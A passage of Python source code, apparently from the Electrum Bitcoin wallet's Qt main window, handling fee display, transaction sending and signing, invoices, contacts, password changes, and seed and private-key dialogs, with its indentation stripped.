except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.is_max:
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return
if o.value is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
status, msg = False, repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.print_error(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
display_msg = _('The server returned an error when broadcasting the transaction.')
if msg:
display_msg += '\n' + msg
parent.show_error(display_msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
self.gui_object.daemon.stop_wallet(wallet_path)
self.close()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(e))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
